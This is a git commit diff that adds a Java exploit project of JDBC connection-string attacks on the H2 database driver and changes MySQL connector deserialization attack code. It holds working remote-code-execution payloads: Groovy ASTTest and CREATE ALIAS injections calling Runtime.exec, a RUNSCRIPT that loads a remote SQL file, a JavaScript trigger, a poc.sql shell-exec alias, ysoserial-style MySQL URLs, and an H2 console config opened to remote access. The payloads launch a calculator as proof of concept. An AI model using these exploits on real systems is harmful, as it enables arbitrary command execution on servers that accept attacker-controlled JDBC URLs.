add JDBC Attack h2 :)

Whoopsunix · Whoopsunix · commit fe3e64c1dd88 · 2023-09-01T15:10:41.000+08:00
diff --git a/JDBCAttack/H2Attack/pom.xml b/JDBCAttack/H2Attack/pom.xml
@@ -0,0 +1,63 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.7.15</version>
+        <relativePath/> <!-- lookup parent from repository -->
+    </parent>
+    <groupId>com.example</groupId>
+    <artifactId>H2Attack</artifactId>
+    <version>0.0.1-SNAPSHOT</version>
+    <name>H2Attack</name>
+    <description>H2Attack</description>
+    <properties>
+        <java.version>1.8</java.version>
+    </properties>
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+
+        <dependency>
+            <groupId>com.h2database</groupId>
+            <artifactId>h2</artifactId>
+            <version>1.4.197</version>
+<!--            <version>1.4.200</version>-->
+<!--            <version>1.2.129</version>-->
+<!--            <version>2.0.202</version>-->
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy-sql -->
+        <dependency>
+            <groupId>org.codehaus.groovy</groupId>
+            <artifactId>groovy-sql</artifactId>
+<!--            <version>3.0.19</version>-->
+            <version>2.0.0-rc-1</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>
diff --git a/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/Groovy.java b/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/Groovy.java
@@ -0,0 +1,25 @@
+package com.example.h2attack;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * Groovy
+ *
+ * version
+ * com.h2database:h2
+ * [1.3.x, 1.4.x, 2.0.x, 2.1.x, 2.2.x]
+ * [1.2.130, 1.2.147]
+ * org.codehaus.groovy:groovy-sql
+ * ALL [3.0.x, 2.6.x, 2.5.x, 2.4.x, 2.3.x, 2.2.x, 2.1.x, 2.0.x]
+ *
+ * @author Whoopsunix
+ */
+public class Groovy {
+    public static void main(String[] args) throws Exception {
+//        Class.forName("org.h2.Driver");
+
+        String attackUrl = "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;init=CREATE ALIAS T5 AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"open -a Calculator\")})def x'";
+        Connection connection = DriverManager.getConnection(attackUrl);
+    }
+}
diff --git a/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/H2AttackApplication.java b/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/H2AttackApplication.java
@@ -0,0 +1,13 @@
+package com.example.h2attack;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class H2AttackApplication {
+
+    public static void main(String[] args) {
+        SpringApplication.run(H2AttackApplication.class, args);
+    }
+
+}
diff --git a/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/Offline.java b/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/Offline.java
@@ -0,0 +1,23 @@
+package com.example.h2attack;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * 将引号转义就可以不用 RUNSCRIPT
+ *
+ * version
+ * com.h2database:h2
+ * [1.3.x, 1.4.x, 2.0.x, 2.1.x, 2.2.x]
+ * [1.2.130, 1.2.147]
+ *
+ * @author Whoopsunix
+ */
+public class Offline {
+    public static void main(String[] args) throws Exception {
+//        Class.forName("org.h2.Driver");
+
+        String attackUrl = "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS if not exists EXEC AS 'void exec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('open -a calculator.app')\\;";
+        Connection connection = DriverManager.getConnection(attackUrl);
+    }
+}
diff --git a/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/RunScript.java b/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/RunScript.java
@@ -0,0 +1,23 @@
+package com.example.h2attack;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * RUNSCRIPT 远程加载 sql 文件
+ *
+ * version
+ * com.h2database:h2
+ * [1.3.x, 1.4.x, 2.0.x, 2.1.x, 2.2.x]
+ * [1.2.130, 1.2.147]
+ *
+ * @author Whoopsunix
+ */
+public class RunScript {
+    public static void main(String[] args) throws Exception {
+//        Class.forName("org.h2.Driver");
+
+        String attackUrl = "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:1234/poc.sql'";
+        Connection connection = DriverManager.getConnection(attackUrl);
+    }
+}
diff --git a/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/TriggerJS.java b/JDBCAttack/H2Attack/src/main/java/com/example/h2attack/TriggerJS.java
@@ -0,0 +1,22 @@
+package com.example.h2attack;
+
+import java.sql.Connection;
+import java.sql.DriverManager;
+
+/**
+ * Trigger 编译执行 Javascript
+ *
+ * version
+ * com.h2database:h2
+ * [1.4.197, 1.4.200]
+ *
+ * @author Whoopsunix
+ */
+public class TriggerJS {
+    public static void main(String[] args) throws Exception {
+//        Class.forName("org.h2.Driver");
+
+        String attackUrl = "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.CATALOGS AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"open -a Calculator.app\")'";
+        Connection connection = DriverManager.getConnection(attackUrl);
+    }
+}
diff --git a/JDBCAttack/H2Attack/src/main/resources/application.yml b/JDBCAttack/H2Attack/src/main/resources/application.yml
@@ -0,0 +1,6 @@
+spring:
+  h2:
+    console:
+      enabled: true
+      settings:
+        web-allow-others: true
diff --git a/JDBCAttack/H2Attack/src/main/resources/poc.sql b/JDBCAttack/H2Attack/src/main/resources/poc.sql
@@ -0,0 +1,7 @@
+CREATE
+ALIAS if not exists SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
+        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
+return s.hasNext() ? s.next() : "";
+}
+$$;
+CALL SHELLEXEC('open -a Calculator.app')
diff --git a/JDBCAttack/MysqlAttack/pom.xml b/JDBCAttack/MysqlAttack/pom.xml
@@ -0,0 +1,50 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <modelVersion>4.0.0</modelVersion>
+
+  <groupId>org.example</groupId>
+  <artifactId>MysqlAttack</artifactId>
+  <version>1.0-SNAPSHOT</version>
+  <packaging>jar</packaging>
+
+  <name>MysqlAttack</name>
+
+  <properties>
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+  </properties>
+
+  <dependencies>
+    <dependency>
+      <groupId>mysql</groupId>
+      <artifactId>mysql-connector-java</artifactId>
+      <!--        <version>3.1.11</version>-->
+      <!--        <version>5.1.29</version>-->
+      <!--      <version>6.0.6</version>-->
+      <version>8.0.19</version>
+    </dependency>
+
+    <dependency>
+      <groupId>commons-collections</groupId>
+      <artifactId>commons-collections</artifactId>
+      <version>3.2.1</version>
+    </dependency>
+  </dependencies>
+
+  <build>
+    <plugins>
+      <plugin>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-maven-plugin</artifactId>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <version>3.8.1</version>
+        <configuration>
+          <source>1.8</source>
+          <target>1.8</target>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+</project>
diff --git a/JDBCAttack/MysqlAttack/src/main/java/org/example/FileAttack.java b/JDBCAttack/MysqlAttack/src/main/java/org/example/FileAttack.java
@@ -1,4 +1,4 @@
-package org.example.mysql;
+package org.example;
 
 import java.sql.Connection;
 import java.sql.DriverManager;
diff --git a/JDBCAttack/MysqlAttack/src/main/java/org/example/SerializeAttack.java b/JDBCAttack/MysqlAttack/src/main/java/org/example/SerializeAttack.java
@@ -1,4 +1,4 @@
-package org.example.mysql;
+package org.example;
 
 import java.sql.Connection;
 import java.sql.DriverManager;
@@ -19,14 +19,14 @@ public static void main(String[] args) throws Exception {
          * 使用 statementInterceptors 参数
          * 需要通过 查询调用
          */
-        String serializeAttackUrl_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
-        String username = "yso_CommonsCollections5_open -a Calculator.app";
-        String password = "";
-        Class.forName("com.mysql.jdbc.Driver");
-        Connection con = DriverManager.getConnection(serializeAttackUrl_5_1_10, username, password);
-        String sql = "select database()";
-        PreparedStatement ps = con.prepareStatement(sql);
-        ResultSet resultSet = ps.executeQuery();
+//        String serializeAttackUrl_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
+//        String username = "yso_CommonsCollections5_open -a Calculator.app";
+//        String password = "";
+//        Class.forName("com.mysql.jdbc.Driver");
+//        Connection con = DriverManager.getConnection(serializeAttackUrl_5_1_10, username, password);
+//        String sql = "select database()";
+//        PreparedStatement ps = con.prepareStatement(sql);
+//        ResultSet resultSet = ps.executeQuery();
 
 
         /**
@@ -63,7 +63,7 @@ public static void main(String[] args) throws Exception {
 //        String driver = "com.mysql.jdbc.Driver";
 //        Class.forName(driver);
 
-        Connection connection = DriverManager.getConnection(serializeAttackUrl_5_29_40);
+        Connection connection = DriverManager.getConnection(serializeAttackUrl_8_7_19);
 
     }
 
diff --git a/JDBCAttack/pom.xml b/JDBCAttack/pom.xml
@@ -5,46 +5,16 @@
     <groupId>org.example</groupId>
     <artifactId>JDBCAttack</artifactId>
     <version>1.0-SNAPSHOT</version>
-    <packaging>jar</packaging>
+    <packaging>pom</packaging>
+
+    <modules>
+        <module>MysqlAttack</module>
+        <module>H2Attack</module>
+    </modules>
 
     <name>JDBCAttack</name>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
     </properties>
-
-  <dependencies>
-    <dependency>
-      <groupId>mysql</groupId>
-      <artifactId>mysql-connector-java</artifactId>
-<!--        <version>3.1.11</version>-->
-<!--        <version>5.1.29</version>-->
-<!--      <version>6.0.6</version>-->
-            <version>8.0.19</version>
-    </dependency>
-
-    <dependency>
-      <groupId>commons-collections</groupId>
-      <artifactId>commons-collections</artifactId>
-      <version>3.2.1</version>
-    </dependency>
-  </dependencies>
-
-  <build>
-    <plugins>
-      <plugin>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-maven-plugin</artifactId>
-      </plugin>
-      <plugin>
-        <groupId>org.apache.maven.plugins</groupId>
-        <artifactId>maven-compiler-plugin</artifactId>
-        <version>3.8.1</version>
-        <configuration>
-          <source>1.8</source>
-          <target>1.8</target>
-        </configuration>
-      </plugin>
-    </plugins>
-  </build>
 </project>
diff --git a/README.md b/README.md
diff --git a/pom.xml b/pom.xml

Original file line number	Diff line number	Diff line change
`@@ -1,4 +1,4 @@`
`1`		`-package org.example.mysql;`
	`1`	`+package org.example;`
`2`	`2`
`3`	`3`	`import java.sql.Connection;`
`4`	`4`	`import java.sql.DriverManager;`